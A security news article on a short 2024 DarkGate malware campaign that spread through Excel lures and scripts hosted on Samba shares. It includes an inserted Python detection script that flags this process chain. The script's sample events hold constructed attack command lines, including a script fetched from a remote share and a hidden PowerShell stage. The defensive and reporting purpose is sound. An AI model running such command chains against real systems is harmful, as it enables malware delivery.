Experts in cybersecurity have revealed a brief DarkGate malware offensive that exploited Samba file shares to kickstart the infections.
Unit 42 from Palo Alto Networks mentioned that this operation took place during March and April 2024, utilizing servers that ran publicly accessible Samba file shares hosting Visual Basic Script (VBS) and JavaScript files. The targeted regions included North America, Europe, and portions of Asia.
“This represents a rather short-lived initiative which serves as a demonstration of how malicious entities can ingeniously misuse legitimate applications and platforms to distribute their malware,” security analysts Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan stated.
Initially emerging in 2018, DarkGate has evolved into a malware-as-a-service (MaaS) offering used by a closely monitored clientele. It includes functions for remotely managing compromised systems, executing code, mining cryptocurrency, launching reverse shells, and deploying additional payloads.
Incidents involving this malware have notably surged in recent times following the global crackdown on the QakBot infrastructure by law enforcement agencies in August 2023.
The investigation conducted by Unit 42 begins with Microsoft Excel (.xlsx) files that, upon opening, prompt victims to click on an embedded Open button, triggering the retrieval and execution of VBS code hosted on a Samba share.
The VBS script is set up to fetch and run a PowerShell script, which in turn downloads a DarkGate package based on AutoHotKey.
Alternative routines utilizing JavaScript files instead of VBS operate similarly, aiming to download and execute the subsequent PowerShell script.
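Detection logic for the delivery chain described above, added here as an example and not taken from the Unit 42 report: it walks constructed Sysmon-style process-creation events and flags an Excel process whose child script host loads a .vbs or .js from a UNC path (a remote file share), followed by PowerShell and then AutoHotkey. All events, paths and the share host 203.0.113.10 are constructed sample data.

```python
import re
from collections import defaultdict

OFFICE = {"excel.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# UNC path to a .vbs/.js file, e.g. \\203.0.113.10\share\loader.vbs (constructed)
UNC_SCRIPT = re.compile(r'\\\\[^\\\s]+\\[^\s"]+\.(?:vbs|js)\b', re.IGNORECASE)

# Constructed process-creation events (pid, ppid, image, command line); not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "cmd": r'EXCEL.EXE "C:\Users\u\Downloads\invoice.xlsx"'},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r"wscript.exe \\203.0.113.10\share\loader.vbs"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -w hidden -c <stage2>"},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\u\AppData\Roaming\AutoHotkey.exe",
     "cmd": r"AutoHotkey.exe script.ahk"},
    # Benign: Excel launching a local macro helper script, no remote share involved.
    {"pid": 500, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "cmd": r'EXCEL.EXE "C:\Users\u\Documents\budget.xlsx"'},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r"wscript.exe C:\Tools\export.vbs"},
]

def basename(image):
    return image.rsplit("\\", 1)[-1].lower()

def find_darkgate_chains(events):
    """Return one finding per Excel process whose descendants match:
    Excel -> wscript/cscript loading a .vbs/.js via UNC path -> powershell -> AutoHotkey."""
    children = defaultdict(list)
    for ev in events:
        children[ev["ppid"]].append(ev)
    findings = []
    for root in events:
        if basename(root["image"]) not in OFFICE:
            continue
        stages = []
        for host in children[root["pid"]]:
            if basename(host["image"]) in SCRIPT_HOSTS and UNC_SCRIPT.search(host["cmd"]):
                stages = ["unc_script"]  # first stage: script fetched from a file share
                for ps in children[host["pid"]]:
                    if basename(ps["image"]) == "powershell.exe":
                        stages.append("powershell")
                        if any(basename(c["image"]).startswith("autohotkey") for c in children[ps["pid"]]):
                            stages.append("autohotkey")
        if stages:
            findings.append({"excel_pid": root["pid"], "stages": stages})
    return findings

if __name__ == "__main__":
    print(find_darkgate_chains(SAMPLE_EVENTS))
```

Only the first Excel process is reported; the second, which runs a script from a local path, produces no finding.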

DarkGate operates by scanning for diverse anti-malware utilities and inspecting the CPU details to differentiate between physical hosts and virtual environments, hence impeding analysis efforts. It also scrutinizes the active processes on the host to identify the presence of debugging tools, reverse engineering tools, or virtualization software.
“The C2 traffic of DarkGate employs unencrypted HTTP requests, although the data is encrypted and appears as Base64-encoded text,” noted the researchers.
“As DarkGate continues to develop and enhance its infiltration techniques and methods to counter analysis, it serves as a strong reminder of the necessity of robust and anticipatory cybersecurity defenses.”